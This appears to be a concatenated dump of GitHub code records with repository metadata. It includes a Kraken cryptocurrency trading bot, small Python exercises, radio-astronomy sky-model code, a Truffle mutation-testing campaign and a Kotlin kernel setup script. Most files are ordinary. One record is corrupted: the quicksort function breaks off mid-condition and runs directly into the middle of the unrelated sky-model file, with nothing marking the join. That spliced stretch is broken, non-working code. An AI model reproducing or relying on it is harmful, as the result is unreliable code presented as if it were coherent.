requirement\")\r\n print(\"Check with second sets of buying condition, this is for detecting slow and steady uptrend\")\r\n\r\n if (final_uptrend_index >= 7.0) and (final_uptrend_index <= 7.5) and (final_downtrend_index >= 5.0) and (final_downtrend_index <= 5.5) and (final_reversal_index >= 1.8) and (final_reversal_index <= 3.0):\r\n print(\"Second set of buying conditions are satisfied...Will buy\")\r\n BOUGHT = QUANTITY * close_price_list[-1]\r\n BOUGHT_PER_UNIT = close_price_list[-1]\r\n\r\n print(\"Making Buy Order...\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_bought = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"buy\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_bought = resp_bought.json()\r\n resp_bought = {'error': []}\r\n # Check if there's any error\r\n if resp_bought['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_bought['result']))\r\n print(\"Bought {} USD at {} per ETH\".format(BOUGHT, BOUGHT_PER_UNIT))\r\n BOUGHT_HIST.append(BOUGHT)\r\n BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n SECOND_BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n BOUGHT_PER_UNIT_LIST.append(BOUGHT_PER_UNIT)\r\n IN_POSITION = True\r\n BOUGHT_PRICE = close_price_list[-1]\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n \r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_bought['error']))\r\n\r\n else:\r\n print(\"Second sets of buying condition not satsified...\")\r\n\r\n elif BUY_SIGNAL == True:\r\n if (atr[-1] < 4.00):\r\n print(\"ATR is below 4.00 and buy signal is up\")\r\n print(\"Buy signal is 
up..will buy when the price starts rising\")\r\n MIN_PRICE = close_price_list[-1] if close_price_list[-1] < MIN_PRICE else MIN_PRICE\r\n print(\"Last atr: {}\".format(atr[-1]))\r\n print(\"Price difference: {}\".format(close_price_list[-1] - MIN_PRICE))\r\n\r\n if ((close_price_list[-1] - MIN_PRICE) < atr[-1]):\r\n print(\"Hold first since the price is still reducing\")\r\n print(\"Price diff smaller than atr\")\r\n else:\r\n print(\"Price diff is greater than atr\")\r\n print(\"Prices are increasing significantly now so buy...\")\r\n print(\"Buy since we are not in position and it is a good time to buy\")\r\n print(\"Condition satisfied:\")\r\n BOUGHT = QUANTITY * close_price_list[-1]\r\n BOUGHT_PER_UNIT = close_price_list[-1]\r\n\r\n print(\"Making Buy Order...\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_bought = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"buy\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_bought = resp_bought.json()\r\n resp_bought = {'error': []}\r\n # Check if there's any error\r\n if resp_bought['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_bought['result']))\r\n print(\"Bought {} USD at {} per ETH\".format(BOUGHT, BOUGHT_PER_UNIT))\r\n BOUGHT_HIST.append(BOUGHT)\r\n BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n BOUGHT_PER_UNIT_LIST.append(BOUGHT_PER_UNIT)\r\n IN_POSITION = True\r\n BUY_SIGNAL = False\r\n BOUGHT_PRICE = close_price_list[-1]\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n \r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_bought['error']))\r\n else:\r\n print(\"ATR is above 4.00, Don't buy yet although buy signal is up\")\r\n\r\n\r\n else:\r\n print(\"This message should not be appearing.....Please debug\")\r\n \r\n\r\n print(\"FUI List: {}\".format(FINAL_UPTREND_INDEX_LIST))\r\n print(\"FDI List: {}\".format(FINAL_DOWNTREND_INDEX_LIST))\r\n print(\"FRI List: {}\".format(FINAL_REVERSAL_INDEX_LIST))\r\n print(\"Buy Price Per Unit: {}\".format(BOUGHT_PER_UNIT_LIST))\r\n print(\"Buy History: {}\".format(BOUGHT_HIST))\r\n print(\"Buy signal time: {}\".format(BUY_SIGNAL_TIME))\r\n print(\"Buy time: {}\".format(BOUGHT_TIME))\r\n print(\"Second Buy time: {}\".format(SECOND_BOUGHT_TIME))\r\n print(\"Sell Price Per Unit: {}\".format(SOLD_PER_UNIT_LIST))\r\n print(\"Sell History: {}\".format(SOLD_HIST))\r\n print(\"Sell signal time: {}\".format(SELL_SIGNAL_TIME))\r\n print(\"Sell time: {}\".format(SOLD_TIME))\r\n print(\"Second Sell time: {}\".format(SECOND_SOLD_TIME))\r\n\r\n if len(SOLD_HIST) == len(BOUGHT_HIST):\r\n PROFIT_HIST = np.array(SOLD_HIST) - np.array(BOUGHT_HIST)\r\n print(\"Profit History: {}\".format(PROFIT_HIST))\r\n NET_PROFIT_HIST = PROFIT_HIST - (np.array(SOLD_HIST) * KRAKEN_FEES) - (np.array(BOUGHT_HIST) * KRAKEN_FEES)\r\n print(\"Net Profit History: {}\".format(NET_PROFIT_HIST))\r\n TOTAL_PROFIT = np.sum(PROFIT_HIST)\r\n print(\"Total Profit: {}\".format(TOTAL_PROFIT))\r\n TOTAL_NET_PROFIT = np.sum(NET_PROFIT_HIST)\r\n print(\"Total Net Profit: {}\".format(TOTAL_NET_PROFIT))\r\n else:\r\n PROFIT_HIST = np.array(SOLD_HIST) - np.array(BOUGHT_HIST[:-1])\r\n print(\"Profit History: 
{}\".format(PROFIT_HIST))\r\n NET_PROFIT_HIST = PROFIT_HIST - (np.array(SOLD_HIST) * KRAKEN_FEES) - (np.array(BOUGHT_HIST) * KRAKEN_FEES)\r\n print(\"Net Profit History: {}\".format(NET_PROFIT_HIST))\r\n TOTAL_PROFIT = np.sum(PROFIT_HIST)\r\n print(\"Total Profit: {}\".format(TOTAL_PROFIT))\r\n TOTAL_NET_PROFIT = np.sum(NET_PROFIT_HIST)\r\n print(\"Total Net Profit: {}\".format(TOTAL_NET_PROFIT))\r\n \r\n print(\"=============================================================================================================\")\r\n\r\n\r\n elif candle_endtime_now == candle_endtime_old:\r\n # Do nothing if the price remains the same within the same candlestick timeframe\r\n # Only update the price when there's a newer price\r\n #print(\"Message received are still under the same candlestick endtime\")\r\n temp_open_price = float(loaded_msg[1][2]) if temp_open_price != float(loaded_msg[1][2]) else temp_open_price\r\n temp_high_price = float(loaded_msg[1][3]) if temp_high_price != float(loaded_msg[1][3]) else temp_high_price\r\n temp_low_price = float(loaded_msg[1][4]) if temp_low_price != float(loaded_msg[1][4]) else temp_low_price\r\n temp_close_price = float(loaded_msg[1][5]) if temp_close_price != float(loaded_msg[1][5]) else temp_close_price\r\n #print(\"Updating the candlestick price, will only append to the list when the price is finalised\")\r\n\r\n else:\r\n pass\r\n \r\n\r\n########## For WebSocket ###########\r\n\r\n\r\n########## For REST API ###########\r\ndef nonce_generator():\r\n \"\"\"\r\n Generates a 14-digit nonce (Number you only used once) by modifying the unix time stamp.\r\n This nonce will be used for every type of HTTP request that is sent to the server\r\n According to Kraken API, nounce must be continuously increasing, there's no way to reset\r\n the nounce for the API key to a lower value.\r\n \"\"\"\r\n unix_time = time.time() # e.g. 1629104436.5457473\r\n # Incase more than one HTTP request is sent within 1 second\r\n mod_unix_time = int(unix_time * 10000) # e.g. 16291044365457\r\n \r\n return mod_unix_time\r\n\r\n\r\ndef get_kraken_signature(urlpath, data, api_secret_key):\r\n \"\"\"\r\n Generate a kraken signature based on nonce, order data and API secret key.\r\n The kraken siganture will be used for every HTTP request communicated through the Kraken REST API\r\n Authenticated request should be signed with \"API-Sign\" header, using a signature generated with\r\n private key, nonce, encoded payload and URL path according to:\r\n HMAC-SHA512 of (URI path + SHA256(nonce + POST data)) and base64 decoded secret API key\r\n \"\"\"\r\n # Encode the data into a string pertaining nonce and the order information\r\n url_encoded = urllib.parse.urlencode(data)\r\n # Combine both strings together and convert it into a byte object\r\n encoded = (str(data['nonce']) + url_encoded).encode() # ENCODE: str to byte\r\n # Convert the encoded byte object into a hash. \r\n # NOTE: Hash allwos the verification of the authenticity of the message\r\n # NOTE: HMAC allows the verification of the autehtnticty and the originator of the message\r\n hashed_message = urlpath.encode() + hashlib.sha256(encoded).digest()\r\n\r\n # HMAC, Hash-based Message Authentication Code, basically provides a cryptographic key to the \r\n # client and the server, this key is only known to the specific client and the specific server\r\n # Convert the HMAC object into a bytes object by hash_mac.digest()\r\n # e.g. 
output b'\\xfe\\x84P\\16\\xd1\\xb3b\\x1a\\xd0\\xc2\\xaf2\r\n hash_mac = hmac.new(key=base64.b64decode(api_secret_key), msg=hashed_message, digestmod=hashlib.sha512).digest()\r\n # Encode the 64 character-HMAC into a bytes object\r\n # e.g .output b'/oRQn+ckRzevMg=='\r\n sigdigest = base64.b64encode(hash_mac)\r\n # Return the string of the byte object, ENCODE = str to byte, DECODE = byte to str\r\n return sigdigest.decode()\r\n\r\n\r\ndef kraken_request(url_path, data, api_key, api_sec):\r\n headers = {}\r\n # Get the API key\r\n headers['API-Key'] = api_key\r\n # Get the Kraken Signature\r\n headers['API-Sign'] = get_kraken_signature(urlpath=url_path, data=data, api_secret_key=API_SECRET_KEY)\r\n req = requests.post(url=(API_URL + url_path), headers=headers, data=data)\r\n return req\r\n########## For REST API ###########\r\n\r\n\r\n########## For Trading Strategy ###########\r\ndef trend_id( high_price_list, low_price_list, close_price_list, timeperiod=20, number=5 ):\r\n \"\"\"\r\n Detect whether the market is going on an uptrend or downtrend based on the highest high\r\n and the lowest low within the time period\r\n Uptrend only when the impulsive move (current highest high) doesn't fall below the pullback (lowest low) \r\n Downtrend only when the impulsive move (current lowest low) doesn't rise above the pullback (highest high)\r\n Return , \r\n \r\n \r\n \"\"\"\r\n # Return the index of the lowest low prices (Which contains many pullback for uptrending price)\r\n low_index = argrelextrema(data = np.array(low_price_list[-timeperiod:]), comparator=np.less, mode='clip')\r\n # Price of the lowest low within the defined time period\r\n low_array = np.array([low_price_list[-timeperiod:][i] for i in low_index[0]]) \r\n # Return the index of the highest high prices (Which contains many pullback for downtrending price)\r\n high_index = argrelextrema(data = np.array(high_price_list[-timeperiod:]), comparator=np.greater, mode='clip')\r\n # Price of the highest high within the defined time period\r\n high_array = np.array([high_price_list[-timeperiod:][i] for i in high_index[0]])\r\n\r\n print(\"##### Trend Detector: #####\")\r\n #if close_price_list[-1] > low_array[0]:\r\n if close_price_list[-1] > close_price_list[-timeperiod]:\r\n # Defined number of the lowest low within the defined time period\r\n # print(\"Greater than the very first pullback neckline\")\r\n print(\"Greater than the very first closing price (oldest closing price) of the time period\")\r\n # Use \"try\" incase there's not enough minima/maxima for \"find_extr_value\" function\r\n # NOTE: the \"lowest_array\" is also a support or a potential resistance\r\n lowest_array = algo_func.find_extr_value(arr=low_array, \r\n number=(len(low_array) if number > len(low_array) else number), \r\n max=False)\r\n print(\"Major uptrend pullback: {}\".format(lowest_array))\r\n print(\"##### Trend Detector #####\")\r\n trend_perc = np.round(np.sum(np.greater(close_price_list[-1], lowest_array) * 1.0) / len(lowest_array), 2)\r\n if trend_perc < 0.5:\r\n trend_perc = 1 - trend_perc\r\n return False, trend_perc, (True, lowest_array) # Second boolean indicating support/resistance, True=spt, False=resistance\r\n else:\r\n return True, trend_perc, (True, lowest_array)\r\n\r\n else:\r\n print(\"Smaller than the very first closing price (oldest closing price) of the time period \")\r\n # NOTE: the \"highest_array\" is also a resistance or a potential support\r\n highest_array = algo_func.find_extr_value(arr=high_array, \r\n number=(len(high_array) if 
number > len(high_array) else number), \r\n max=True)\r\n print(\"Major downtrend pullback: {}\".format(highest_array))\r\n print(\"##### Trend Detector: #####\")\r\n trend_perc = np.round(np.sum(np.less(close_price_list[-1], highest_array) * 1.0) / len(highest_array), 2)\r\n if trend_perc < 0.5:\r\n trend_perc = 1 - trend_perc\r\n return True, trend_perc, (False, highest_array) # Second boolean indicating support/resistance, True=spt, False=resistance\r\n else:\r\n return False, trend_perc, (False, highest_array) \r\n\r\n\r\n########## For Trading Strategy ###########\r\n\r\n\r\n# Define the payload that will be sent for subscription to the websocket\r\npayload = {\r\n \"event\": \"subscribe\",\r\n \"pair\": [\r\n \"ETH/USD\"\r\n ],\r\n \"subscription\": {\r\n \"name\": \"ohlc\"\r\n }\r\n}\r\n\r\n# Initialise the websocket application\r\nws = websocket.WebSocketApp(url=SOCKET, on_open=on_open, on_message=on_message, on_close=on_close)\r\n# Connect to the socket and remains forever connected until interrupted\r\nws.run_forever()\r\n","repo_name":"imseeom/Crypto-Trading-Bot-with-KrakenAPI","sub_path":"bot_v4.py","file_name":"bot_v4.py","file_ext":"py","file_size_in_byte":55717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30242963541","text":"\"\"\"\nAuthor: Le Bui Ngoc Khang\nDate: 12/07/1997\nProblem: Using the value of data from Exercise 1, write the values of the following\nexpressions:\na. data.endswith('i')\nb. \" totally \".join(data.split())\n\nSolution:\n\na. False\nb. Python totally rules!\n\n\"\"\"\n# string data page 118 exercise 01\ndata = \"Python rules!\"\n\n# data.endswith('i')\ns = data.endswith('i')\nprint(s)\n\n# \" totally \".join(data.split())\nstring_one = \" totally \"\nstring_two = data.split()\nprint(string_one.join(string_two))","repo_name":"lebuingockhang123/L-p-tr-nh-python","sub_path":"LeBuiNgocKhang_53157_CH04/Exercise/page_118_exercise_02.py","file_name":"page_118_exercise_02.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27580358416","text":"def partition(arr,start,end):\r\n i=0\r\n pivot=arr[end]\r\n p=start\r\n for i in range(start,end):\r\n if(arr[i]<=pivot):\r\n arr[i],arr[p]=arr[p],arr[i]\r\n p+=1\r\n arr[p],arr[end]=arr[end],arr[p]\r\n return (p)\r\ndef quicksort(arr,start,end):\r\n if(start differential in spatial dimensions\n # Jy is already differential in freq and time\n # Unit of multifrequency movies: Jy/sr\n # Because then: integral over time and freq and space -> J / m²\n\n # But also: we want that single-time, single-freq reconstructions have the\n # same numbers as multifreq movies\n\n if normalize_time and normalize_freq and normalize_space:\n broadcast = ift.ContractionOperator(domain, spaces=None).adjoint\n return inp*(broadcast @ inp.sum().scale(sdom.scalar_dvol/ntime/nfreq).ptw('reciprocal'))\n # return inp*(broadcast @ inp.sum().scale(sdom.scalar_dvol).ptw('reciprocal'))\n if normalize_space:\n broadcast = ift.ContractionOperator(domain, spaces=3).adjoint\n return inp*(broadcast @ inp.integrate(3).ptw('reciprocal'))\n raise NotImplementedError\n\n\ndef _cfm(*, total_domain, **kwargs):\n from ducc0.fft import good_size\n\n # Prepare domains\n pdom, tdom, fdom, sdom = total_domain\n total_domain_padded = list(total_domain)\n with_time = tdom.shape[0] > 1\n if with_time:\n dt = np.diff(tdom.coordinates)\n try:\n np.testing.assert_allclose(\n dt, dt[0]\n ) # This model 
work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the time domain is equispaced.\"\n raise AssertionError(s)\n dt = dt[0]\n nt = good_size(int(np.round(tdom.shape[0] * kwargs.pop(\"time_zero_padding_factor\"))))\n rg_time = ift.RGSpace(nt, dt)\n padded_tdom = rve.IRGSpace(np.arange(nt) * dt + tdom.coordinates[0])\n total_domain_padded[1] = padded_tdom\n\n foo = rg_time.distances[0] / 3600\n if foo > 1.0:\n foo = f\"{foo:.1f} h\"\n else:\n foo = f\"{foo*60:.1f} min\"\n else:\n rg_time = tdom\n\n with_freq = fdom.shape[0] > 1\n if with_freq:\n df = np.diff(fdom.coordinates)\n try:\n np.testing.assert_allclose(\n df, df[0]\n ) # This model work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the frequency domain is equispaced.\"\n raise AssertionError(s)\n df = df[0]\n nf = good_size(int(np.round(fdom.shape[0] * kwargs.pop(\"freq_zero_padding_factor\"))))\n rg_freq = ift.RGSpace(nf, df)\n padded_fdom = rve.IRGSpace(np.arange(nf) * df + fdom.coordinates[0])\n total_domain_padded[2] = padded_fdom\n else:\n rg_freq = fdom\n # /Prepare domains\n\n # Assemble operator parts\n additional = {}\n logsky = {}\n for lbl in pdom.labels:\n lbl = lbl.upper()\n\n # CFM\n cfg_zm = {\n \"offset_mean\": kwargs[f\"stokes{lbl}_zero_mode_offset\"],\n \"offset_std\": _parse_mean_std(kwargs, f\"stokes{lbl}_zero_mode\"),\n }\n\n cfg_time = {}\n cfg_space = {}\n cfg_freq = {}\n for kk in [\"fluctuations\", \"flexibility\", \"asperity\", \"loglogavgslope\"]:\n cfg_space[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_space_{kk}\")\n if with_time:\n cfg_time[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_time_{kk}\")\n if with_freq:\n cfg_freq[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_freq_{kk}\")\n\n cfm = ift.CorrelatedFieldMaker(f\"stokes{lbl} \")\n if with_time:\n cfm.add_fluctuations(rg_time, **cfg_time, prefix=\"time \")\n if with_freq:\n cfm.add_fluctuations(rg_freq, **cfg_freq, prefix=\"freq \")\n cfm.add_fluctuations(sdom, **cfg_space, prefix=\"space \")\n cfm.set_amplitude_total_offset(**cfg_zm)\n op = cfm.finalize(0)\n additional['raw sky'] = op\n # /CFM\n\n # Zero-padding\n op = op.ducktape_left((rg_time, rg_freq, sdom))\n if op.target[0].size > 1:\n tmpdom = ift.RGSpace(tdom.shape)\n tmpfdom = op.target[1]\n zeropadder = ift.FieldZeroPadder(\n (tmpdom, tmpfdom, sdom), rg_time.shape, space=0\n ).adjoint\n op = zeropadder.ducktape(op.target) @ op\n if op.target[1].size > 1:\n tmpdom = ift.RGSpace(fdom.shape)\n zeropadder = ift.FieldZeroPadder(\n (tdom, tmpdom, sdom), rg_freq.shape, space=1\n ).adjoint\n op = zeropadder.ducktape(op.target) @ op\n # /Zero-padding\n\n logsky[lbl] = op.ducktape_left((tdom, fdom, sdom))\n\n normampl = list(cfm.get_normalized_amplitudes())\n if with_freq:\n additional[f\"stokes{lbl} freq normalized power spectrum\"] = normampl.pop(0) ** 2\n if with_time:\n additional[f\"stokes{lbl} time normalized power spectrum\"] = normampl.pop(0) ** 2\n additional[f\"stokes{lbl} space normalized power spectrum\"] = normampl.pop(0) ** 2\n # /Assemble operator parts\n\n logsky = reduce(add, (oo.ducktape_left(lbl) for lbl, oo in logsky.items()))\n mexp = rve.polarization_matrix_exponential_mf2f(logsky.target, nthreads=ift.nthreads())\n \n sky = mexp @ logsky\n\n sky = sky.ducktape_left(total_domain)\n\n return sky, additional\n\n\ndef _parse_mean_std(dct, key):\n res = dct[f\"{key}_mean\"], dct[f\"{key}_std\"]\n if res == (\"None\", \"None\") or res == (None, None):\n return None\n return 
res\n\n\ndef _multi_freq_movie_polynom(dom, cfg_section):\n from ducc0.fft import good_size\n\n pdom, tdom, fdom, sdom = dom\n with_time = tdom.shape[0] > 1\n total_domain_padded = list(dom)\n\n if with_time:\n dt = np.diff(tdom.coordinates)\n try:\n np.testing.assert_allclose(dt, dt[0]) # This model work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the time domain is equispaced.\"\n raise AssertionError(s)\n dt = dt[0]\n nt = good_size(int(np.round(tdom.shape[0]*cfg_section.getfloat(\"time zero-padding factor\"))))\n rg_time = ift.RGSpace(nt, dt)\n padded_tdom = rve.IRGSpace(np.arange(nt)*dt + tdom.coordinates[0])\n total_domain_padded[1] = padded_tdom\n print(f\"Time domain (dt={rg_time.distances[0]/3600/24}days):\")\n print(rg_time)\n else:\n rg_time = tdom\n\n ops = {}\n for key in [\"i0\", \"alpha\", \"beta\"]:\n cfg_zm = {\n \"offset_mean\": cfg_section.getfloat(f\"{key} zero mode offset\"),\n \"offset_std\": _parse_mean_std(cfg_section, f\"{key} zero mode\"),\n }\n cfg_space, cfg_time = {}, {}\n for kk in [\"fluctuations\", \"flexibility\", \"asperity\", \"loglogavgslope\"]:\n cfg_space[kk] = _parse_mean_std(cfg_section, f\"{key} space {kk}\")\n if with_time:\n cfg_time[kk] = _parse_mean_std(cfg_section, f\"{key} time {kk}\")\n cfm = ift.CorrelatedFieldMaker(key)\n if with_time:\n cfm.add_fluctuations(rg_time, **cfg_time, prefix=\"time \")\n cfm.add_fluctuations(sdom, **cfg_space, prefix=\"space \")\n cfm.set_amplitude_total_offset(**cfg_zm)\n op = cfm.finalize(0)\n assert len(op.target.shape) == 3 if with_time else 2\n # Remove padded area\n if with_time and op.target[1].size > 1:\n tmpdom = ift.RGSpace(tdom.shape)\n zeropadder = ift.FieldZeroPadder((tmpdom, sdom), rg_time.shape, space=0).adjoint\n op = zeropadder.ducktape(op.target) @ op\n op = op.ducktape_left((tdom, sdom))\n if not with_time:\n op = op.ducktape_left((tdom,) + tuple(op.target))\n # /Remove padded area\n ops[key] = op\n additional_operators = ops\n\n freq = np.array(fdom.coordinates)\n freq0 = freq.mean()\n freq = ift.makeField(fdom, freq)\n\n cfm_expander = ift.ContractionOperator((tdom, fdom, sdom), 1).adjoint\n freq_expander = ift.ContractionOperator((tdom, fdom, sdom), (0, 2)).adjoint\n i0 = cfm_expander @ ops[\"i0\"]\n alpha = cfm_expander @ ops[\"alpha\"]\n beta = cfm_expander @ ops[\"beta\"]\n\n normalized_freq = freq_expander(ift.log(freq/freq0))\n\n logsky = i0 + ift.makeOp(normalized_freq) @ alpha + ift.makeOp(normalized_freq**2) @ beta\n\n\n sky = logsky.exp()\n\n sky = sky.ducktape_left(dom)\n\n return sky, additional_operators\n\n\ndef _fdom_prefactor(fdom, cfg_section, order=2):\n freq = np.array(fdom.coordinates)\n freq0 = freq.mean()\n freq = ift.makeField(fdom, freq)\n normalized_freq = ift.log(freq/freq0)\n freq_expander = ift.ContractionOperator(fdom, None).adjoint\n\n c = [freq_expander @ ift.NormalTransform(cfg_section.getfloat(f\"prefactor c{ii} mean\"),\n cfg_section.getfloat(f\"prefactor c{ii} stddev\"),\n f\"prefactor c{ii}\") for ii in range(order+1)]\n\n x = normalized_freq\n logop = reduce(add, (ift.makeOp(x**iorder) @ cc for iorder, cc in enumerate(c)))\n\n op = logop.exp()\n assert op.target == ift.makeDomain(fdom)\n return op\n","repo_name":"jknollm/VLBI_Resolve_EHT_SgrA","sub_path":"src/sky_model.py","file_name":"sky_model.py","file_ext":"py","file_size_in_byte":12965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907475300","text":"#Phumelele 
Ndimande\r\n#Assignment 6\r\n\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\nname=input(\"Enter the names of parties (terminated by DONE):\\n\")\r\nparties={}\r\nif name!=\"DONE\":\r\n parties[name]=parties.get(name,1)\r\n\r\n#count entries until user types DONE\r\nwhile name!=\"DONE\":\r\n name=input(\"\")\r\n if name!=\"DONE\":\r\n parties[name]=parties.get(name,0)+1\r\nprint()\r\nprint(\"Vote counts:\")\r\n \r\n #convert keys in parties into a list \r\nlist_parties=list(parties)\r\n\r\n#sort list in alphabetical order\r\nlist_parties.sort()\r\n\r\nfor i in list_parties:\r\n print(i,\" \"*(9-len(i)),\"-\",parties[i])","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/ndmphu004/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16207428395","text":"from functools import *\n\nres = set()\n\n@lru_cache(None)\ndef f(s, e, c):\n global res\n if s == e:\n res.add(c)\n return 1\n elif s > e:\n return 0\n else:\n return f(s+1, e, c+1) + f(s+5, e, c+1) + f(s*3, e, c+1)\n\nf(1, 227, 0)\nprint(min(res))\n","repo_name":"Ivan-Black-dev/INFO_2023","sub_path":"23/3443.py","file_name":"3443.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2799093960","text":"from eth_vertigo.mutator.mutator import Mutator\nfrom eth_vertigo.mutator.truffle.solidity_file import SolidityFile\nfrom eth_vertigo.mutator.solidity.solidity_mutator import SolidityMutator\nfrom eth_vertigo.test_runner.truffle import TruffleRunnerFactory\nfrom eth_vertigo.test_runner.exceptions import EquivalentMutant\nfrom eth_vertigo.core import Mutation, MutationResult\nfrom eth_vertigo.core.campaign import Campaign\nfrom eth_vertigo.core.truffle.truffle_compiler import TruffleCompiler\nfrom eth_vertigo.test_runner.exceptions import TestRunException, TimedOut\n\nfrom typing import List, Callable\nfrom time import time\nfrom pathlib import Path\nimport logging\nfrom queue import Queue\n\n\nclass TruffleCampaign(Campaign):\n \"\"\"\n A TruffleCampaign class\n\n Implements specific campaign logic for the truffle framework\n \"\"\"\n def __init__(\n self,\n project_directory: Path,\n truffle_compiler: TruffleCompiler,\n truffle_runner_factory: TruffleRunnerFactory,\n mutators: List[Mutator],\n networks: List[str] = (),\n filters=None\n ):\n super().__init__(filters=filters)\n self.project_directory = project_directory\n self.source_directory = project_directory / \"build\" / \"contracts\"\n self.truffle_compiler = truffle_compiler\n\n self.sources = list(self._get_sources())\n self.base_run_time = None\n self.networks = networks\n self.networks_queue = Queue(maxsize=len(networks))\n self.bytecodes = {}\n\n self.truffle_runner_factory = truffle_runner_factory\n self.mutators = mutators\n self.mutators.append(SolidityMutator())\n\n for network in networks:\n self.networks_queue.put(network)\n\n def _get_sources(self, dir=None):\n \"\"\" Implements basic mutator file discovery \"\"\"\n if not (self.project_directory / \"build\").exists():\n self.truffle_compiler.run_compile_command(str(self.project_directory))\n\n dir = dir or self.source_directory\n for source_file in dir.iterdir():\n if source_file.name == \"Migrations.json\":\n continue\n if not source_file.name.endswith(\".json\"):\n continue\n yield 
SolidityFile(source_file)\n\n def valid(self):\n \"\"\" Checks whether the current project is valid \"\"\"\n tr = self.truffle_runner_factory.create(str(self.project_directory))\n\n begin = time()\n\n network = None\n if self.networks:\n network = self.networks_queue.get()\n try:\n test_result = tr.run_tests(network=network)\n finally:\n if self.networks:\n self.networks_queue.put(network)\n\n self.base_run_time = time() - begin\n if test_result is None:\n return False\n\n return all([result.success for result in test_result.values()])\n\n def setup(self):\n for source in self.sources:\n for mutator in self.mutators:\n self.mutations += mutator.mutate(source, self.project_directory)\n for f in self.filters:\n self.mutations = f.apply(self.mutations)\n self.is_set_up = True\n\n def test_mutation(self, mutation: Mutation, done_callback: Callable):\n \"\"\" Run the test suite using a core and check for murders \"\"\"\n tr = self.truffle_runner_factory.create(str(self.project_directory))\n mutation.result = MutationResult.LIVED\n network = None\n if self.networks:\n network = self.networks_queue.get()\n try:\n try:\n test_result = tr.run_tests(\n mutation=mutation,\n timeout=int(self.base_run_time) * 2,\n network=network,\n original_bytecode=self.bytecodes\n )\n if any(map(lambda t: not t.success, test_result.values())):\n mutation.result = MutationResult.KILLED\n except EquivalentMutant:\n mutation.result = MutationResult.EQUIVALENT\n except TimedOut:\n mutation.result = MutationResult.TIMEDOUT\n except TestRunException as e:\n logging.warning(str(e))\n mutation.result = MutationResult.ERROR\n finally:\n if self.networks:\n self.networks_queue.put(network)\n done_callback()\n return\n\n def store_compilation_results(self):\n \"\"\" Stores compilation results for trivial compiler equivalence\"\"\"\n self.bytecodes = self.truffle_compiler.get_bytecodes(working_directory=str(self.project_directory))\n","repo_name":"cucrisis/vertigo","sub_path":"eth_vertigo/core/truffle/truffle_campaign.py","file_name":"truffle_campaign.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"12649489141","text":"# from distutils.core import setup\nimport kotlin_kernel\nfrom setuptools import setup\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nsetup(\n name='kotlin_kernel',\n version=kotlin_kernel.__version__,\n packages=['kotlin_kernel'],\n description='A Kotlin kernel for Jupyter',\n long_description=readme,\n author='HelgeCPH',\n author_email='ropf@itu.dk',\n url='https://github.com/HelgeCPH/kotlin_kernel',\n install_requires=[\n 'jupyter_client==5.2.3', 'IPython', 'ipykernel', 'requests', 'jinja2'\n ],\n include_package_data=True,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Education',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 3',\n ],\n)\n","repo_name":"HelgeCPH/kotlin_kernel","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"39580437648","text":"import logging\r\n\r\n#初始化,相当于 